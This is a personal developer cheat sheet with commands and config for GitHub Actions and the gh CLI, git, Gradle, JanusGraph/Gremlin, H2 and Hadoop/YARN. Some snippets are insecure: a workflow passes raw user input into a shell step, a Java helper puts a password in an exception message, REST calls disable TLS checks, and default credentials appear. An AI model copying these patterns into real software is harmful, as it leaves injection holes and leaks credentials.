  -d '{"encrypted_value":"'$BASE64_ENCODED_SECRET'","key_id":"'$GITHUB_PUBLIC_KEY_ID'"}' \
  https://api.github.com/repos/$OWNER/$REPO/actions/secrets/$SECRET_NAME


https://api.github.com/repositories/REPOSITORY_ID/environments/ENVIRONMENT_NAME/secrets/SECRET_NAME
https://api.github.com/repos/OWNER/REPO/actions/secrets/SECRET_NAME

curl -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/repos/$OWNER/$REPO/actions/secrets/$SECRET_NAME

github render/run html/js/javascript files from github

githack.com

Development

https://raw.githack.com/[user]/[repository]/[branch]/[filename.ext]

Production (CDN)

https://rawcdn.githack.com/[user]/[repository]/[branch]/[filename.ext]
https://raw.githack.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

github.io

http://htmlpreview.github.io/?[full path to html page]

http://htmlpreview.github.io/?https://github.com/cherkavi/javascripting/blob/master/d3/d3-bar-chart.html
http://htmlpreview.github.io/?https://github.com/twbs/bootstrap/blob/gh-pages/2.3.2/index.html

git find bad commit, check bad commits in the log

git bisect start
git bisect bad [commit]
git bisect good [commit]
# git bisect bad  # mark commit as bad
# git bisect good # mark commit as good

git bisect run my_script my_script_arguments  # check negative/positive answer
git bisect visualize
git bisect reset
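
a minimal sketch of a test script for git bisect run ( file name, build and test commands are placeholders ): exit code 0 marks the commit as good, 125 skips a commit that cannot be tested, any other code between 1 and 127 marks it as bad

cat > my_script <<'EOF'
#!/bin/bash
# 0 -> good, 125 -> skip ( cannot test ), 1..127 except 125 -> bad
make build || exit 125
./run-tests.sh
EOF
chmod +x my_script

git bisect start
git bisect bad HEAD
git bisect good 1.0.13        # a known good tag/commit ( placeholder )
git bisect run ./my_script
git bisect reset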

git remove bad commit from the log history

mkdir git-wrong-commit
cd git-wrong-commit
git init

echo "1" >> test-file.txt 
git add *
git commit --message 'commit 1'
git log --oneline

echo "2" >> test-file.txt 
git add *
git commit --message 'commit 2'
git log --oneline

echo "3" >> test-file.txt 
git add *
git commit --message 'commit 3'
git log --oneline


echo "wrong" >> test-file.txt 
git add *
git commit --message 'commit 4 - wrong'
git log --oneline


echo "5" >> test-file.txt 
git add *
git commit --message 'commit 5'
git log --oneline

echo "6" >> test-file.txt 
git add *
git commit --message 'commit 6'
git log --oneline

# will not work: short commit like ce66b4f 
# will not work: variable instead of commit hash WRONG_COMMIT=ce66b4f6065c754a2c3dbc436bc82498dd04d722
#                if [ $GIT_COMMIT = $WRONG_COMMIT ]; 
git filter-branch --commit-filter 'if [ $GIT_COMMIT = ce66b4f6065c754a2c3dbc436bc82498dd04d722 ]; then skip_commit "$@"; else git commit-tree "$@"; fi' -- --all

git push --force 

gh cli command line tool

gh auth login --hostname $GIT_HOST
gh auth status

WORKFLOW_FILE_NAME=tools.yaml

gh workflow list
gh workflow view --ref $GIT_BRANCH_NAME $WORKFLOW_FILE_NAME
gh workflow run $WORKFLOW_FILE_NAME --ref $GIT_BRANCH_NAME
gh run list --workflow=$WORKFLOW_FILE_NAME

# run workflow by name from last branch
gh workflow run $WORKFLOW_FILE_NAME --ref $(git branch --show-current)

# print out last log output of the workflow by name
gh run view --log $(gh run list --json databaseId --jq '.[0].databaseId')



gh variable list
gh variable set $VARIABLE_NAME --body $VARIABLE_VALUE

# search pull request via CLI, search not opened pull requests
gh pr list -S 'author:cherkavi is:merged'

gh complete

eval "$(gh completion -s bash)"

github actions (workflow, pipeline )

github marketplace - collections of actions to use

flowchart LR
s[step] --o j[job] --o p[pipeline]
t[trigger] --> p
e[event] --> p
  • env variables: ${{...}}
  • file sharing
  • job image
  • jobs:
    • parallel
    • sequence
  • agent/node
  • events:
    • manual
    • auto
    • schedule
  • place for workflows
touch .github/workflows/workflow-1.yml
  • simple example of the workflow
name: name of the workflow
on:
  pull_request:
    branches: [features]
    types: [closed]
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'
  push:
    branches: 
      - master

jobs:
  name-of-the-job:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout
      uses: actions/checkout@v3 

checkout with submodules ( avoid issue with not visible "last commit" ) :

    steps:
    - name: Checkout
      uses: actions/checkout@v3
    - name: Checkout module update
      run: git submodule update --remote
  • workflow with env variable
env:
  # Set Node.js Version
  NODE_VERSION: '18.x'
jobs:
  install-build-test:
    runs-on: ubuntu-latest

    steps:
    - name: Check out
      uses: actions/checkout@v3

    - name: Set environment variable
      run: echo "DEST_VERSION=${{ env.NODE_VERSION }}" >> $GITHUB_ENV

    - name: npm with node js
      uses: actions/setup-node@v3
      with:        
        node-version: ${{env.DEST_VERSION}} # node-version: ${{env.NODE_VERSION}}
        cache: 'npm'
name: 'input output example'
description: 'Greet someone'
inputs:
  person-name:  
    description: 'input parameter example'
    required: true
    default: 'noone'
outputs:
  random-number:
    description: "Random number"
    value: ${{ steps.random-number-generator.outputs.random-id }}
runs:
  using: "composite"
  steps:
    - id: simple-print
      run: echo Hello ${{ inputs.person-name }}.
    - id: change-dir-and-run
      run: cd backend && npm ci
    - id: output-value
      run: echo "::set-output name=random-id::$(echo $RANDOM)"
      if: ${{ github.event_name == 'pull_request' }} # if: github.ref == 'refs/heads/main'
    - id: condition-from-previous-step
      run: echo "random was generated ${{ steps.output-value.outputs.random-id }}"
      if: steps.output-value.outputs.random-id != ''
  • workflow with input parameter
name: ping ip-address

on:
  workflow_dispatch:
    inputs:
      target:
        description: 'target address'
        required: true

jobs:
  ping_and_traceroute:
    runs-on: ubuntu-latest
    steps:
      - name: Run commands
        run: |
          sudo apt update
          sudo apt install -y traceroute 
          ping -c 5 ${{ github.event.inputs.target }}
          traceroute ${{ github.event.inputs.target }}
        shell: bash
gh workflow run ping.yaml --ref main -f target=8.8.8.8

workflow specific variables like github.xxxxx
workflow specific variables like jobs.xxxxx
workflow environment variables

  • workflow with waiting for run
  step-1:
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "step 1"
  step-2:
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "step 2"
        
  post-build-actions:
    needs: [step-1, step-2]
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "after both"
  • run cloud formation, aws login
# Workflow name
name: create-cloudformation-stack

jobs:
  create-stack:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v3
   
    - name: AWS credentials
      uses: aws-actions/configure-aws-credentials@v2
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-session-token: ${{secrets.AWS_SESSION_TOKEN}}
        aws-region: us-east-1

    - name: Create CloudFormation Stack
      uses: aws-actions/aws-cloudformation-github-deploy@v1
      with:
        name: run cloudformation script
        template: cloudformation.yml

einaregilsson/beanstalk-deploy@v21

  • actions use secrets, aws login rest api

git workflow secrets aws login, aws login

    steps:
    - name: Access ot aws
      env:
        AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        AWS_SESSION_TOKEN: ${{ secrets.AWS_SESSION_TOKEN }}
      run: |
        aws configure set default.region us-east-1      
        aws elasticbeanstalk delete-environment --environment-name my-node-app-pr-${{ github.event.pull_request.number }}
  • run python application, install oracle client, hide password, use variables
      - name: cache file 
        id: cache-oracle-client-zip
        uses: actions/cache@v3
        with:
          path: ~/
          key: extfile-${{ hashFiles('**/instantclient-basiclite-linux.x64-23.4.0.24.05.zip') }}
          restore-keys: |
            extfile-

      - name: Download Instant Client
        if: steps.cache-oracle-client-zip.outputs.cache-hit != 'true'
        run: |
          sudo apt-get update
          sudo apt-get install libaio1 wget unzip
          wget https://download.oracle.com/otn_software/linux/instantclient/2340000/instantclient-basiclite-linux.x64-23.4.0.24.05.zip

      - name: Unzip archive file 
        run: |
          rm -rf instantclient_23_4
          unzip -o instantclient-basiclite-linux.x64-23.4.0.24.05.zip
          # sudo mv instantclient_23_4 /opt/oracle  # libclntsh.so
          echo "export LD_LIBRARY_PATH=$(pwd)/instantclient_23_4:$LD_LIBRARY_PATH" >> $GITHUB_ENV 

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt   # cx_Oracle

      - name: Oracle sql request
        run:  echo "SELECT *
                from dual
              " > query.sql

      - name: Set new environment variable
        run: | 
          echo "ORACLE_USER=${{ vars.ORACLE_INT_USER }}" >> $GITHUB_ENV
          echo "ORACLE_HOST=${{ vars.ORACLE_INT_HOST }}" >> $GITHUB_ENV
          echo "ORACLE_PORT=${{ vars.ORACLE_INT_PORT }}" >> $GITHUB_ENV
          echo "ORACLE_SERVICE=${{ vars.ORACLE_INT_SERVICE }}" >> $GITHUB_ENV
          echo "OUTPUT_FILE=report.csv" >> $GITHUB_ENV
          echo "ORACLE_REQUEST=query.sql" >> $GITHUB_ENV
      
      - name: Run Python script
        run: |
          # ls "$(pwd)"/instantclient_23_4
          ORACLE_PASS=${{ secrets.ORACLE_INT_PASS }} LD_LIBRARY_PATH=$(pwd)"/instantclient_23_4" python oracle-select-to-csv.py
  • action to use cache
- name: cache file 
  id: cache-ext-file
  uses: actions/cache@v3
  with:
    path: ~/    # folder with file 
    key: extfile-${{ hashFiles('**/archive.tar.gz') }}
    restore-keys: |
      extfile-
- name: download and extract
  if: steps.cache-ext-file.outputs.cache-hit != 'true'
  run: |
    mkdir -p folder_with_file
    curl -O https://archive.com/application/archive.tar.gz
    tar -xzf archive.tar.gz -C folder_with_file
  • communicate with next step
      - name: list files on SSH 
        id: ssh_step
        run: |
          csv_file_count=`ls *.csv | wc -l`
          if [[ $csv_file_count > 0 ]]; then
            file_name="report_"$(date +"%Y-%m-%d-%H-%M-%S")".zip"
            zip -r  $file_name . -i \*.csv
            echo "::set-output name=file_name::$file_name"
          fi

      - name: print archive file
        if: steps.ssh_step.outputs.file_name != ''        
        run: |
          echo "path: ${{ steps.ssh_step.outputs.file_name }}"

:TODO: Github Action how to connect localhost runner to github.action ?

Go lang cheat sheet

# default path according: https://go.dev/doc/install
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin
# go libraries/packages path
export GOPATH=/home/soft/go_lib

Links

Issues

bazel buildifier

intention

go install github.com/bazelbuild/buildtools/buildifier@latest

error message

can't load package: package github.com/bazelbuild/buildtools/buildifier@latest: cannot use path@version syntax in GOPATH mode

solution

GOPATH=/home/projects/goroot
go install github.com/bazelbuild/buildtools/buildifier
cd $GOPATH/src/github.com/bazelbuild/buildtools/buildifier
bazel build :all

possible (didn't check it) alternative way

go mod init buildifier
# go mod init .
go mod download repo@version
# go mod download github.com/bazelbuild/buildtools/buildifier@latest

buildifier

/home/projects/goroot/bin/buildifier -mode fix {file_path}
# bazel run //bazel/tools/buildifier:fix

Gradle cheat sheet

setup

DEST_FOLDER=$HOME_SOFT/gradle/bash_completion
mkdir -p $DEST_FOLDER
curl -LA gradle-completion https://edub.me/gradle-completion-bash -o $DEST_FOLDER/gradle-completion.bash

echo 'source $HOME_SOFT/gradle/bash_completion/gradle-completion.bash' >> ~/.bashrc

gradle commands

print all dependencies for project, dependency tree

gradlew dependencies

download dependencies to separate folder

task downloadDependenciesToRuntime(type: Copy) {
    from sourceSets.main.runtimeClasspath
    into 'runtime/'
}

execute gradle with specific build.gradle file

gradlew.bat -b migration-job/build.gradle build

quite output, output without messages

gradlew.bat -q build

gradle debug

# https://docs.gradle.org/current/userguide/build_environment.html
gradle -Dorg.gradle.debug=true --no-daemon clean

skip tests

gradlew build -x test
gradlew test --test "com.example.android.testing.blueprint.unit.integrationTests.*"

execute single test

gradlew test -Dtest.single=< wildcard of test > build

custom task, run script

init groovy project

gradle init --groovy-application
gradle init --type java-library
  • java-application
  • java-library
  • scala-library
  • groovy-library
  • basic

execute groovy script

add into build.gradle

task runScript (dependsOn: 'classes', type: JavaExec) {
    main = 'App'
    classpath = sourceSets.main.runtimeClasspath
}

execute script

gradle runScript

proxy settings

gradle build -Dhttp.proxyHost=proxy-host -Dhttp.proxyPort=8080 -Dhttp.proxyUser=q4577777 -Dhttp.proxyPassword=my-password

Graph Database cheat sheet

links

UI editor

janus gremlin

start with docker

docker container on localhost ( avoid local installation )

# start Janus server
docker pull janusgraph/janusgraph:0.6
# x-www-browser https://hub.docker.com/r/janusgraph/janusgraph/tags
DOCKER_TAG=0.6
docker run --rm --name janusgraph-default --volume `pwd`:/workspace:rw --network="host" janusgraph/janusgraph:$DOCKER_TAG
# start Gremlin console
docker exec -e GREMLIN_REMOTE_HOSTS=localhost -it  janusgraph-default ./bin/gremlin.sh

# connect to Janus container
# docker exec -e GREMLIN_REMOTE_HOSTS=localhost -it  janusgraph-default /bin/bash

docker containers with link between containers

# Janus server
docker rm janusgraph-default
docker run --name janusgraph-default janusgraph/janusgraph:latest
# --port 8182:8182

# Gremlin console in separate docker container
docker run --rm --link janusgraph-default:janusgraph -e GREMLIN_REMOTE_HOSTS=janusgraph -it janusgraph/janusgraph:latest ./bin/gremlin.sh

Gremlin console

Embedded connection ( local )

// with local connection
graph = TinkerGraph.open()
// g = traversal().withEmbedded(graph)
graph.features()

g = graph.traversal()

remote connection with submit

// connect to database, during the start should be message in console like: "plugin activated: tinkerpop.server"
:remote connect tinkerpop.server conf/remote.yaml
// check connection
:remote
// --------- doesn't work:
// config = new PropertiesConfiguration()
// config.setProperty("clusterConfiguration.hosts", "127.0.0.1");
// config.setProperty("clusterConfiguration.port", 8182);
// config.setProperty("clusterConfiguration.serializer.className", "org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0");
// ioRegistries = org.janusgraph.graphdb.tinkerpop.JanusGraphIoRegistry
// config.setProperty("clusterConfiguration.serializer.config.ioRegistries", ioRegistries); // (e.g. [ org.janusgraph.graphdb.tinkerpop.JanusGraphIoRegistry) ]
// config.setProperty("gremlin.remote.remoteConnectionClass", "org.apache.tinkerpop.gremlin.driver.remote.DriverRemoteConnection");
// config.setProperty("gremlin.remote.driver.sourceName", "g");
// graph = TinkerGraph.open(config)
// --------- doesn't work:
// graph = EmptyGraph.instance().traversal().withRemote(config);
// g = graph.traversal()

remote connection without submit

import static org.apache.tinkerpop.gremlin.process.traversal.AnonymousTraversalSource.traversal;
g = traversal().withRemote("conf/remote-graph.properties");

??? doesn't work with connecting points

// with remote connection
cluster = Cluster.build().addContactPoint('127.0.0.1').create()
client = cluster.connect()
// g = traversal().withRemote(DriverRemoteConnection.using("localhost", 8182));
g = new GraphTraversalSource(DriverRemoteConnection.using(client, 'g'))

gremlin simplest dataset example

WARN: default connection is local, need to "submit" each time

// insert data, add :submit if you didn't connect to the cluster
// :submit g.addV('person').....
alice=g.addV('Alice').property('sex', 'female').property('age', 30).property('name','Alice');
bob=g.addV('Bob').property('sex', 'male').property('age', 35).property('name','Bob').as("Bob");
marie=g.addV('Marie').property('sex', 'female').property('age', 5).property('name','Marie');
g.tx().commit() // only for transactional TraversalSource

// select id of element
alice_id=g.V().hasLabel('Alice').id().next();
bob_id=g.V().has('name','Bob').id().next()
alice_id=g.V().has('name','Alice').id().next()
marie_id=g.V().has('name','Marie').id().next()
bob=g.V( bob_id )
alice=g.V( alice_id )
:show variables

// select vertex
g.V() \
 .has("sex", "female") \
 .has("age", lte(30)) \
 .valueMap("age", "sex", "name")
//  .values("age")       


// g.V().hasLabel('Bob').addE('wife').to(g.V().has('name', 'Alice'))
// The child traversal of [GraphStep(vertex,[]), HasStep([name.eq(Alice)])] was not spawned anonymously - use the __ class rather than a TraversalSource to construct the child traversal
g.V(bob_id).addE('wife').to(__.V(alice_id)) \
 .property("start_time", 2010).property("place", "Canada");

g.V().hasLabel('Bob').addE('daughter').to(__.V().has('name', 'Marie')) \
 .property("start_time", 2013).property("birth_place", "Toronto");

g.addE('mother').to(__.V(alice_id)).from(__.V(marie_id))


// select all vertices
g.V().id()

// select all edges
g.E()

// select data: edges out of
g.V().has("name","Bob").outE()
// select data: edges in to
g.V().has("name","Alice").inE().outV().values("name")
// select data: out edge(wife), point in 
g.V().has("name","Bob").outE("wife").inV().values("name")
// select data: out edge(wife), point to Vertext, in edge(mother), coming from 
g.V().has("name","Bob").outE("wife").inV().inE("mother").outV().values("name")


// remove Vertex
g.V('4280').drop()

// remove Edge
g.V().has("name", "Bob").outE("wife").drop()


:exit
// export DB to GraphSON ( JSON )
g.io("/workspace/output.json").with(IO.writer, IO.graphson).write().iterate()
// import from GraphSON ( JSON ) to DB
g.io("/workspace/output.json").with(IO.reader, IO.graphson).read().iterate()

// export DB to GraphML ( XML )
g.io("/workspace/output.xml").with(IO.writer, IO.graphml).write().iterate()
// import from GraphML ( XML ) to DB
g.io("/workspace/output.xml").with(IO.reader, IO.graphml).read().iterate()

// ------------ doesn't work
// import db
// graph = JanusGraphFactory.open('conf/janusgraph.properties')
// graph = JanusGraphFactory.open('conf/remote-graph.properties')
// reader = g.graph.io(graphml()).reader().create()
// inputStream = new FileInputStream('/workspace/simple-dataset.graphml')
// reader.readGraph(inputStream, g.graph)
// inputStream.close()

g.V()
# x-www-browser https://pypi.org/project/gremlinpython/
pip3 install gremlinpython

python obtain traversal

from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
g = traversal().withRemote(DriverRemoteConnection('ws://127.0.0.1:8182/gremlin','g'))

python obtain traversal

from gremlin_python.process.graph_traversal import __
from gremlin_python.process.traversal import T
from gremlin_python.process.traversal import IO
from gremlin_python.structure.graph import Graph
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection

g = Graph().traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin', 'g'))

python read values

for each in g.V().valueMap(True).toList():
    print(each)

v1 = g.V().valueMap(True).toList()[0]
v1.id
v1.label

python drop values

id_of_vertex=4096
g.V(id_of_vertex).drop().iterate()

script from file

# this path is **server path** not the local one
PATH_TO_EXPORT_JSON="/workspace/output.json"
g.io(PATH_TO_EXPORT_JSON).with_(IO.reader, IO.graphson).read().iterate()

groovy lang

links

groovysh

default set of libraries

$HOME/.groovy/lib

parse json

JSON slurper

strings

def singleQuote = 'Single quote string'
def doubleQuote = "Double quote string"
def slashy = /Slashy string/

gRPC

links

flowchart LR

subgraph client [client side]
direction TB

ca[client application] -->|1| ced[client encoding]

ced -->|2 client| cr[gRPC Runtime]

cr -->|3| ctr[transport]
end

subgraph server [server side]
direction TB

ctr -->|4| str[transport]
str -->|5| sr[gRPC Runtime]
sr -->|6| sed[client decoding] 
sed -->|7| sa[server application]
end


sa --> sed
sed --> sr
sr --> str

str --> ctr
ctr --> cr
cr --> ced
ced --> ca


h2 Oracle dialect

spring.datasource.url=jdbc:h2:mem:testdb;Mode=Oracle
spring.datasource.platform=h2
spring.datasource.driver-class-name=org.h2.Driver
spring.jpa.hibernate.ddl-auto=none
spring.datasource.continue-on-error=true

activate console via property file

spring.h2.console.enabled=true
spring.h2.console.path=/h2-console
spring.h2.console.settings.web-allow-others=true
spring.h2.console.settings.trace=true

h2 yaml version

###
#   Database Settings
###
spring:
  datasource:
    # url: jdbc:h2:mem:user-app;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE
    url: jdbc:h2:~/user-manager.h2;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE
    platform: h2
    username: sa
    password:
    driverClassName: org.h2.Driver
  jpa:
    database-platform: org.hibernate.dialect.H2Dialect
    hibernate:
      ddl-auto: update
    properties:
      hibernate:
        show_sql: false
        use_sql_comments: true
        format_sql: true

###
#   H2 Settings
###
  h2:
    console:
      enabled: true
      path: /console
      settings:
        trace: false
        web-allow-others: false

print help

java -cp h2-1.4.192.jar org.h2.tools.Server -?

Server mode start, web console start

java -jar h2-1.4.192.jar  -webAllowOthers -webPort 9108 -tcpAllowOthers -tcpPort 9101 -tcpPassword sa

connection ( !!! the file must be placed in the same folder where the application was started; the ./ current-folder prefix in the path is mandatory )

jdbc:h2:tcp://localhost:9101/./user-manager.h2

Server mode start, web console start, with specifying folder where file with data placed

java -jar h2-1.4.192.jar  -webAllowOthers -webPort 9108 -tcpAllowOthers -tcpPort 9101 -tcpPassword sa -baseDir C:\project\h2-server 

connection to server

jdbc:h2:tcp://localhost:9101/user-manager.h2

connection to server with database creation

jdbc:h2:tcp://localhost:9101/new-database-

Server mode connection

!!! the file must be placed in the same folder where the application was started; the ./ current-folder prefix in the path is mandatory

jdbc:h2:tcp://localhost:9101/./user-manager.h2

maven dependency

    <dependency>
      <groupId>com.h2database</groupId>
      <artifactId>h2</artifactId>
      <version>1.4.197</version>
    </dependency>

create connection

    private Connection obtainJdbcConnection(String url, String user, String password) {
        try{
            return DriverManager.getConnection(url, user, password);
        }catch(SQLException ex){
            throw new IllegalArgumentException(String.format("can't obtain connection from jdbc: %s, user:%s, password: %s ", url, user, password), ex);
        }
    }

create user

create user if not exists sonar password 'sonar' admin;

create schema

create schema sonar authorization sonar;
SET SCHEMA sonar;

Hadoop cheat sheet

Theory

what data, information, knowledge, experience are

Map-Reduce pattern

graph LR

m[🗺️ <b>MAP</b>] ==> c(combine)
c --> s(🔄 shuffle 
        📑 'sort') --> r[🧮 <b>REDUCE</b>]

YARN

Yet Another Resource Negotiator

Nodes

  • Namenode

    namespace, meta-info, file blocks
    single point of failure
    single point of communication for external clients

  • Datanode

    data blocks, sends heartbeat to the Namenode
    a worker is executed on a DataNode; each worker is associated with a slot on that DataNode

Daemons

  • Primary Node
  • Secondary Node
  • Data Node

file workflow

graph LR

is([input 
    splitter])
f[[file]]
s[[split]]
rr([record 
    reader])
r[[record]]
kv[[key
   value]]

if([input
    format])

f -.read
     one.-> is -.write 
                 many
                 (each mapper).-> s 
s -.read.-> rr -.create.-> r
r -.-> if
if -.-> kv

Hadoop into Docker container

  • MapR
  • Hortonworks
  • Cloudera

Hadoop run mode

  • standalone ( 1:1 )
  • pseudo-distributed ( 1:many )
  • distributed ( many:many )
docker run --hostname=quickstart.cloudera --privileged=true -t -i -p 7180 4239cd2958c6 /usr/bin/docker-quickstart

cloudera run:

docker run -v /tmp:/home/root/tmp --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -t -i sequenceiq/hadoop-docker 

IBM education container start

docker run -it --name bdu_spark2 -P -p 4040:4040 -p 4041:4041 -p 8080:8080 -p 8081:8081 bigdatauniversity/spark2:latest \
  -- /etc/bootstrap.sh -bash

( images: hadoop2 yarn, hadoop1, sensor use case )

HDFS common commands

there are two possibilities for communication - shell(below), API
communication goes via NameNode
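
a minimal sketch of the API way via the WebHDFS REST interface ( assumption: WebHDFS is enabled; the NameNode HTTP port is typically 9870 on Hadoop 3.x and 50070 on Hadoop 2.x ):

NAMENODE=hadoop-local
# list a directory
curl -s "http://${NAMENODE}:9870/webhdfs/v1/data?op=LISTSTATUS" | jq .
# read a file ( the NameNode redirects to a DataNode, -L follows the redirect )
curl -sL "http://${NAMENODE}:9870/webhdfs/v1/data/Iris.csv?op=OPEN" | head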

MapR implementation

# hdfs dfs -ls
hadoop fs -ls

admin command, cluster settings

hdfs dfsadmin -report

list of namenodes, list of secondary nodes

no data, not a part of hadoop cluster
Heartbeat: DataNode ---> NameNode

hdfs getconf -namenodes
hdfs getconf -secondaryNameNodes
hdfs getconf -confKey dfs.namenode.name.dir

stop-all.sh
start-all.sh
/etc/init.d/ha
/etc/init.d/hadoop-name

confKey:

  • dfs.namenode.name.dir
  • fs.defaultFS
  • yarn.resourcemanager.address
  • mapreduce.framework.name
  • dfs.namenode.name.dir
  • dfs.default.chunk.view.size
  • dfs.namenode.fs-limits.max-blocks-per-file
  • dfs.permissions.enabled
  • dfs.namenode.acls.enabled
  • dfs.replication
  • dfs.replication.max
  • dfs.namenode.replication.min
  • dfs.blocksize
  • dfs.client.block.write.retries
  • dfs.hosts.exclude
  • dfs.namenode.checkpoint.edits.dir
  • dfs.image.compress
  • dfs.image.compression.codec
  • dfs.user.home.dir.prefix
  • dfs.permissions.enabled
  • io.file.buffer.size
  • io.bytes-per-checksum
  • io.seqfile.local.dir

help ( Distributed File System )

hdfs dfs -help
hdfs dfs -help copyFromLocal
hdfs dfs -help ls
hdfs dfs -help cat
hdfs dfs -help setrep

list files

hdfs dfs -ls /user/root/input
hdfs dfs -ls hdfs://hadoop-local:9000/data
# -rw-r--r--   1 root supergroup       5107 2017-10-27 12:57 hdfs://hadoop-local:9000/data/Iris.csv
#              ^ factor of replication

files count

hdfs dfs -count /user/root/input

1st column - number of directories ( including the current one ), 2nd column - number of files in the folder, 3rd column - size of the folder in bytes
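
a sketch of how the three columns line up ( the numbers below are made up for illustration ):

hdfs dfs -count /user/root/input
#           3           12             104857 /user/root/input
#     folders        files        size(bytes) path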

check if folder exists

hdfs dfs -test -d /user/root/some_folder
echo $?
# 0 - exists
# 1 - not exits

checksum ( md5sum )

hdfs dfs -checksum <path to file>

hdfs logic emulator

java -jar HadoopChecksumForLocalfile-1.0.jar V717777_MDF4_20190201.MF4 0 512 CRC32C

locally only

hdfs dfs -cat <path to file> | md5sum

find folders ( for cloudera only !!! )

hadoop jar /opt/cloudera/parcels/CDH/jars/search-mr-1.0.0-cdh5.14.4-job.jar org.apache.solr.hadoop.HdfsFindTool -find hdfs:///data/ingest/ -type d -name "some-name-of-the-directory"

find files ( for cloudera only !!! )

hadoop jar /opt/cloudera/parcels/CDH/jars/search-mr-1.0.0-cdh5.14.4-job.jar org.apache.solr.hadoop.HdfsFindTool -find hdfs:///data/ingest/ -type f -name "some-name-of-the-file"

change factor of replication

hdfs dfs -setrep -w 4 /data/file.txt

create folder

hdfs dfs -mkdir /data 

copy files from local filesystem to remote

hdfs dfs -put /home/root/tmp/Iris.csv /data/
hdfs dfs -copyFromLocal /home/root/tmp/Iris.csv /data/

copy files from local filesystem to remote with replication factor

hdfs dfs -Ddfs.replication=2 -put /path/to/local/file /path/to/hdfs

copy ( small files only !!! ) from local to remote ( read from DataNodes and write to DataNodes !!!)

hdfs dfs -cp /home/root/tmp/Iris.csv /data/

remote copy ( the client is not used as a pipe )

hadoop distcp /home/root/tmp/Iris.csv /data/

read data from DataNode

hdfs dfs -get /path/to/hdfs /path/to/local/file
hdfs dfs -copyToLocal /path/to/hdfs /path/to/local/file

remove data from HDFS ( to Trash !!! special for each user)

hdfs dfs -rm -r /path/to/hdfs-folder

remove data from HDFS

hdfs dfs -rm -r -skipTrash /path/to/hdfs-folder

clean up trash bin

hdfs dfs -expunge

file info ( disk usage )

hdfs dfs -du -h /path/to/hdfs-folder

is file/folder exists ?

hdfs dfs -test -e /path/to/hdfs-folder

list of files ( / - root )

hdfs dfs -ls /
hdfs dfs -ls hdfs://192.168.1.10:8020/path/to/folder

the same as previous but with fs.default.name = hdfs://192.168.1.10:8020

hdfs dfs -ls /path/to/folder
hdfs dfs -ls file:///local/path   ==   (ls /local/path)

show all sub-folders

hdfs dfs -ls -R /

standard commands for hdfs

-touchz, -cat (-text), -tail, -mkdir, -chmod, -chown, -count ....

java application run, java run, java build

hadoop classpath
hadoop classpath --glob
# javac -classpath `hadoop classpath` MyProducer.java

Hadoop governance, administration

filesystem capacity, disk usage in human readable format

hdfs dfs -df -h

file system check, reporting, file system information

hdfs fsck /

balancer for distributed file system, necessary after failing/removing/eliminating some DataNode(s)

hdfs balancer

administration of the filesystem

hdfs dfsadmin -help

show statistic

hdfs dfsadmin -report

HDFS to "read-only" mode for external users

hdfs dfsadmin -safemode enter   # get | leave | wait
hdfs dfsadmin -upgrade
hdfs dfsadmin -backup

Security

  • File permissions ( posix attributes )
  • Hive ( grant revoke )
  • Knox ( REST API for hadoop )
  • Ranger
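for the first item above ( plain HDFS posix permissions ), a minimal sketch; paths, users and groups are illustrative

hdfs dfs -chown jerry:analysts /data/ingest
hdfs dfs -chmod 750 /data/ingest
# ACLs work only when dfs.namenode.acls.enabled=true
hdfs dfs -setfacl -m user:tom:r-x /data/ingest
hdfs dfs -getfacl /data/ingest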

job execution

flowchart RL

TT@{ shape: rect, label: "Task Tracker", color: red }

TT[Task Tracker] --o|composite| JT[Job Tracker]

JT -->|create| TT

TT -.->|send 
        heartbeat| JT

Job Tracker:

  • creates tasks for Task Trackers
  • MapReduce governance
  • monitoring
  • restart of failed tasks
run jar on the cluster

hadoop jar {path to jar} {classname}
yarn jar {path to jar} {classname}

application list on YARN

yarn application --list

application list with ALL states

yarn application -list -appStates ALL

application status

yarn application -status application_1555573258694_20981

application kill on YARN

yarn application -kill application_1540813402987_3657

application log on YARN

yarn logs -applicationId application_1540813402987_3657 | less

application log on YARN by user

yarn logs -applicationId application_1540813402987_3657 -appOwner my_tech_user | less

YARN REST API

# https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html#Cluster_Writeable_APIs
# https://docs.cloudera.com/runtime/7.2.1/yarn-reference/topics/yarn-use-the-yarn-rest-apis-to-manage-applications.html
YARN_USER=$USER_AD
YARN_PASS=$USER_AD
YARN_URL=https://mapr-web.vantage.zur
YARN_PORT=10101

APP_ID=application_1670952222247_1113333
# application state 
curl --user $YARN_USER:$YARN_PASS --insecure $YARN_URL:$YARN_PORT/ws/v1/cluster/apps/$APP_ID/state
# kill application 
curl -v -X PUT --user $YARN_USER:$YARN_PASS --insecure -H "Content-Type: application/json" -d '{"state": "KILLED"}' $YARN_URL:$YARN_PORT/ws/v1/cluster/apps/$APP_ID/state

# application find 
APP_TAG=33344447eb9c81f4fd7a
curl -X GET --user $YARN_USER:$YARN_PASS --insecure $YARN_URL:$YARN_PORT/ws/v1/cluster/apps?applicationTags=$APP_TAG | jq .

Hortonworks sandbox

tutorials ecosystem sandbox tutorial download install instruction getting started

Web SSH

localhost:4200
root/hadoop

SSH access

ssh root@localhost -p 2222

